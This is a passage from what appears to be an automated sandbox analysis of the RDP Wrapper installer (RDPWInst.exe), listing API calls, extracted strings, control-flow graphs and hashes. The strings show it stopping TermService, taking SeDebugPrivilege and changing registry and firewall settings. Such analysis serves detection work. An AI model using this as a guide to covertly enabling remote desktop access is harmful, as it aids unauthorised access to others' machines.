                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLastService$EnumServicesStatus$ManagerOpen
                                                                                • String ID: $sD$ServicesActive$TermService$[*] No shared services found.$[*] Shared services found: $[+] TermService found (pid $[-] EnumServicesStatusEx error (code $[-] Failed to set up TermService. Unknown error.$[-] OpenSCManager error (code $[-] TermService not found.
                                                                                • API String ID: 2770857348-2470772499
                                                                                • Opcode ID: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                • Instruction ID: fb74497bf6b161f68451673f63bd6f491a4d1cb4b87c09a1aee9fb4a9c308b37
                                                                                • Opcode Fuzzy Hash: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                • Instruction Fuzzy Hash: A1C15074A041049BD710FBB9DD42B5E76A5EB89308F11507FF640BB292CB3CAD058BAE
                                                                                Function 0043B1A8 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 118serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B1FE
                                                                                • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B209
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000), ref: 0043B24F
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B25B
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B260
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                • String ID: $sD$...$ServicesActive$[*] Configuring $[-] ChangeServiceConfig error (code $[-] OpenSCManager error (code $[-] OpenService error (code
                                                                                • API String ID: 48634454-398082305
                                                                                • Opcode ID: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                • Instruction ID: ec3001641675e227f0f71ffcc16d431bf32a474d6a16b1f18b89db5f0a2815a5
                                                                                • Opcode Fuzzy Hash: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                • Instruction Fuzzy Hash: 32318DA4708210AAE611B7B68D43B2F6598DF8D308F12917BB614A6693CB3C9D0195BF
                                                                                Function 0043BF00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 130COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043BFA6
                                                                                • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BFAF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastProcess$CurrentLookupOpenPrivilegeTokenValue
                                                                                • String ID: $sD$[-] AdjustTokenPrivileges error (code $[-] LookupPrivilegeValue error (code $[-] OpenProcessToken error (code
                                                                                • API String ID: 1401577899-1200187420
                                                                                • Opcode ID: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                • Instruction ID: 40249df541e28cb1c3cbeffac081f98f3db748ff3bf72c69c2aa91bf02ef4f1c
                                                                                • Opcode Fuzzy Hash: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                • Instruction Fuzzy Hash: E5412475E00218AFDB04EBE5DD81A9EB7B8EF49704F11407BF500F2291DA789D059B6A
                                                                                Function 0043DC64 Relevance: 6.1, APIs: 4, Instructions: 64libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC7A
                                                                                • FindResourceW.KERNEL32(00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC8A
                                                                                • LoadResource.KERNEL32(00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DC97
                                                                                • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DCF5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoadResource$FindFree
                                                                                • String ID:
                                                                                • API String ID: 3272429154-0
                                                                                • Opcode ID: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                • Instruction ID: b141022db8bc2a2b6abfb651a233e3798db1869765cd13709d0418182ea328c4
                                                                                • Opcode Fuzzy Hash: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                • Instruction Fuzzy Hash: 9411E3273067445AC721DA268A81EDF3B169FC1340F09C1A6F9009F396E679C901C39A
                                                                                Function 004093C0 Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093DC
                                                                                • GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093E5
                                                                                  • Part of subcall function 004092D8: FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                  • Part of subcall function 004092D8: FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                • String ID:
                                                                                • API String ID: 3216391948-0
                                                                                • Opcode ID: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                • Instruction ID: 6b7a5b6d94b1cbf22f3d71e7f3d695f59a60f48835f9eba26b4dd19c2a33d547
                                                                                • Opcode Fuzzy Hash: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                • Instruction Fuzzy Hash: 58F05E752412086FDB00DE9DD888DA677DCBF18368F4044AAF94CDF382C679EC408B64
                                                                                Function 004092D8 Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                • Instruction ID: eb757cbb51915ae52a623e93d498bac1ae70d661531f8aa58739ae681ecdb70c
                                                                                • Opcode Fuzzy Hash: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                • Instruction Fuzzy Hash: B8D02B7250010823CA2099BC8CC9E9F734C5B05234F0803677DA8E33D1FA35D9100198
                                                                                Function 00409D02 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 31276548-0
                                                                                • Opcode ID: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                • Instruction ID: dea72ce09e15e74ad366377f5463cd755b9610de14ca7f4492471b38ec8a052a
                                                                                • Opcode Fuzzy Hash: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                • Instruction Fuzzy Hash: 12B012106085015BC908E73D4D4744B31C01A40524FC40234745CE62C2F65DCAA546DF
                                                                                Function 0044373C Relevance: 81.5, APIs: 8, Strings: 46, Instructions: 524COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 44373c-44373f 1 443744-443749 0->1 1->1 2 44374b-4437d0 call 40a2b0 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404504 1->2 31 443876-443965 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 2->31 32 4437d6-4437f0 call 404564 call 4072a4 2->32 105 443f97-443fb1 call 406be8 31->105 42 4437f6-443810 call 404564 call 4072a4 32->42 43 44396a-443984 call 404564 call 4072a4 32->43 42->43 59 443816-443830 call 404564 call 4072a4 42->59 56 443986-4439a7 call 43cea4 call 407450 call 404cdc call 4042f8 43->56 57 4439ac-4439ba call 414708 43->57 56->105 68 4439bc-4439e8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 57->68 69 4439ed-4439f4 call 43a644 57->69 59->43 79 443836-443850 call 404564 call 4072a4 59->79 68->105 83 4439f6-443a0c call 407450 call 404cdc call 4042f8 69->83 84 443a11-443a30 call 43a7bc call 404564 call 4072a4 69->84 79->43 111 443856-443870 call 404564 call 4072a4 79->111 83->105 127 443cc4-443cde call 404564 call 4072a4 84->127 128 443a36-443a3d 84->128 111->31 111->43 150 443ce4-443ceb 127->150 151 443e6b-443e85 call 404564 call 4072a4 127->151 133 443a5f-443b13 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 128->133 134 443a3f-443a5a call 407450 call 404cdc call 4042f8 call 40632c 128->134 354 443b15-443b24 call 406bf0 133->354 355 443b26-443b30 call 406bf0 133->355 134->133 156 443d0d-443d2a call 407450 call 404cdc call 4042f8 150->156 157 443ced-443d08 call 407450 call 404cdc call 4042f8 call 40632c 150->157 177 443e87-443e8e 151->177 178 443ecb-443ee5 call 404564 call 4072a4 151->178 201 443d31-443dac call 43b7d4 call 407450 call 404cdc call 4042f8 call 43c9b4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 407450 call 404cdc call 4042f8 call 43d938 call 40816c 156->201 202 443d2c call 43a688 156->202 157->156 184 443eb0-443ec6 call 407450 call 404cdc call 4042f8 call 43f7a4 177->184 185 443e90-443eab call 407450 call 404cdc call 4042f8 call 40632c 177->185 178->105 215 443eeb-443f46 call 407450 call 404cdc call 4042f8 call 43b7d4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 178->215 184->178 185->184 343 443dd3-443e0b Sleep call 43b58c Sleep call 404564 call 4072a4 201->343 344 443dae-443dbd call 40816c 201->344 202->201 303 443f6d-443f92 Sleep call 43b58c call 407450 call 404cdc call 4042f8 215->303 304 443f48-443f57 call 40816c 215->304 303->105 304->303 318 443f59-443f5a 304->318 323 443f5c-443f6b call 43b58c 318->323 323->303 366 443e47-443e4e 343->366 367 443e0d-443e42 call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 343->367 344->343 353 443dbf-443dc0 344->353 357 443dc2-443dd1 call 43b58c 353->357 365 443b35-443b3c 354->365 355->365 357->343 368 443b43-443b7d call 43de78 call 43b7d4 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 365->368 369 443b3e call 43a688 365->369 370 443e55-443e66 call 407450 call 404cdc call 4042f8 366->370 371 443e50 call 43a724 366->371 367->366 408 443b9f 368->408 409 443b7f-443b99 call 404564 call 4072a4 368->409 369->368 370->151 371->370 410 443ba1-443c21 call 43d0f8 call 407450 call 404cdc call 4042f8 call 43c598 call 407450 call 404cdc call 4042f8 call 43e7dc call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 408->410 409->408 418 443b9b-443b9d 409->418 446 443c23-443c32 call 40816c 410->446 447 443c48-443c9b Sleep call 43b58c Sleep call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 410->447 418->410 446->447 452 443c34-443c35 446->452 471 443ca0-443cbd call 407450 call 404cdc call 4042f8 447->471 454 443c37-443c46 call 43b58c 452->454 454->447 471->127 478 443cbf call 43a724 471->478 478->127
                                                                                Strings
                                                                                • %ProgramFiles%\RDP Wrapper\rdpwrap.dll, xrefs: 00443B2B
                                                                                • TermService, xrefs: 00443C52, 00443DDD, 00443F77
                                                                                • [+] Successfully uninstalled., xrefs: 00443E57
                                                                                • do not use the software., xrefs: 00443ACF
                                                                                • [*] Configuring firewall..., xrefs: 00443C85, 00443E2C
                                                                                • -u -k uninstall wrapper and keep settings, xrefs: 0044393B
                                                                                • [*] Configuring registry..., xrefs: 00443C68, 00443E0F
                                                                                • Installer v2.5, xrefs: 0044378D
                                                                                • [*] Configuring service library..., xrefs: 00443BAD
                                                                                • LpD, xrefs: 0044374F
                                                                                • only >= 6.0 (Vista, Server 2008 and newer) are supported., xrefs: 004439D4
                                                                                • [*] Terminating service..., xrefs: 00443BE3, 00443D53, 00443F08
                                                                                • license, xrefs: 00443989
                                                                                • [-] Unsupported Windows version:, xrefs: 004439BE
                                                                                • -i install wrapper to Program Files folder (default), xrefs: 004438CD
                                                                                • [*] Checking dependencies..., xrefs: 00443BC8
                                                                                • [*] RDP Wrapper Library is already installed., xrefs: 00443A41
                                                                                • $sD, xrefs: 00443761
                                                                                • [*] Notice to user:, xrefs: 00443A61
                                                                                • -i -o online install mode (loads latest INI file), xrefs: 004438F9
                                                                                • RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r], xrefs: 0044388E
                                                                                • -l display the license agreement, xrefs: 004438B7
                                                                                • [*] Extracting files..., xrefs: 00443B4F
                                                                                • [+] Done., xrefs: 00443F83
                                                                                • USAGE:, xrefs: 00443878
                                                                                • -u uninstall wrapper, xrefs: 00443925
                                                                                • [-] Unsupported processor architecture., xrefs: 004439F8
                                                                                • SeDebugPrivilege, xrefs: 00443BF7, 00443D67, 00443F1C
                                                                                • [*] Uninstalling..., xrefs: 00443D0F
                                                                                • [+] Successfully installed., xrefs: 00443CA2
                                                                                • %SystemRoot%\system32\rdpwrap.dll, xrefs: 00443B1A
                                                                                • [*] RDP Wrapper Library is not installed., xrefs: 00443CEF, 00443E92
                                                                                • [*] Checking for updates..., xrefs: 00443EB2
                                                                                • Copyright (C) Stas'M Corp. 2017, xrefs: 004437A3
                                                                                • RDP Wrapper Library v1.6.2, xrefs: 00443777
                                                                                • [*] Restarting..., xrefs: 00443EED
                                                                                • -w get latest update for INI file, xrefs: 0044390F
                                                                                • - By using all or any portion of this software, you are agreeing, xrefs: 00443A77
                                                                                • to be bound by all the terms and conditions of the license agreement., xrefs: 00443A8D
                                                                                • - If you do not agree to any terms of the license agreement,, xrefs: 00443AB9
                                                                                • [*] Removing files..., xrefs: 00443D87
                                                                                • - To read the license agreement, run the installer with -l parameter., xrefs: 00443AA3
                                                                                • -r force restart Terminal Services, xrefs: 00443951
                                                                                • [*] Resetting service library..., xrefs: 00443D38
                                                                                • [*] Installing..., xrefs: 00443AE5
                                                                                • -i -s install wrapper to System32 folder, xrefs: 004438E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: - By using all or any portion of this software, you are agreeing$ - If you do not agree to any terms of the license agreement,$ - To read the license agreement, run the installer with -l parameter.$ do not use the software.$ only >= 6.0 (Vista, Server 2008 and newer) are supported.$ to be bound by all the terms and conditions of the license agreement.$$sD$%ProgramFiles%\RDP Wrapper\rdpwrap.dll$%SystemRoot%\system32\rdpwrap.dll$-i install wrapper to Program Files folder (default)$-i -o online install mode (loads latest INI file)$-i -s install wrapper to System32 folder$-l display the license agreement$-r force restart Terminal Services$-u uninstall wrapper$-u -k uninstall wrapper and keep settings$-w get latest update for INI file$Copyright (C) Stas'M Corp. 2017$Installer v2.5$LpD$RDP Wrapper Library v1.6.2$RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r]$SeDebugPrivilege$TermService$USAGE:$[*] Checking dependencies...$[*] Checking for updates...$[*] Configuring firewall...$[*] Configuring registry...$[*] Configuring service library...$[*] Extracting files...$[*] Installing...$[*] Notice to user:$[*] RDP Wrapper Library is already installed.$[*] RDP Wrapper Library is not installed.$[*] Removing files...$[*] Resetting service library...$[*] Restarting...$[*] Terminating service...$[*] Uninstalling...$[+] Done.$[+] Successfully installed.$[+] Successfully uninstalled.$[-] Unsupported Windows version:$[-] Unsupported processor architecture.$license
                                                                                • API String ID: 0-551293883
                                                                                • Opcode ID: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                • Instruction ID: 3b3904e08207714e519852b142ec2c0d1fdd34891fa1322cb905310c24a2fa21
                                                                                • Opcode Fuzzy Hash: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                • Instruction Fuzzy Hash: D60208A4B091404BEB00BBFB894324EA5519FC574CF92817FB604B72D7CA3CA8156A7F
                                                                                Function 0043E864 Relevance: 34.8, APIs: 7, Strings: 16, Instructions: 305COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 480 43e864-43e877 481 43e879-43e88d call 4387ec 480->481 482 43e88f-43e89b call 4387a8 480->482 487 43e89e-43e8bc call 438890 call 4389d8 481->487 482->487 492 43e8fa-43e95f call 4396b8 call 438860 487->492 493 43e8be-43e8f5 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 487->493 504 43ed53-43ed61 call 40518c 492->504 505 43e965-43e976 call 4389d8 492->505 493->492 513 43e9b4-43ea21 call 4396b8 call 438860 call 4389d8 505->513 514 43e978-43e9af GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 505->514 533 43ea23-43ea5a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 513->533 534 43ea5f-43eac3 call 4396b8 call 438860 call 439d1c 513->534 514->513 533->534 550 43eac8-43eaca 534->550 550->504 552 43ead0-43eae1 call 4389d8 550->552 558 43eae3-43eb1a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 552->558 559 43eb1f-43eb38 call 438860 call 4389d8 552->559 558->559 569 43eb76-43ebf8 call 4392f0 call 439674 call 438860 call 4389d8 559->569 570 43eb3a-43eb71 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 559->570 596 43ec36-43ecb8 call 4392f0 call 439674 call 438860 call 4389d8 569->596 597 43ebfa-43ec31 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 569->597 570->569 618 43ecf6-43ed4e call 439674 call 438860 596->618 619 43ecba-43ecf1 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 596->619 597->596 618->504 619->618
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00447324), ref: 0043E8BE
                                                                                • GetLastError.KERNEL32(?,?,00447324), ref: 0043E978
                                                                                • GetLastError.KERNEL32(?,?,00447324), ref: 0043EA23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast
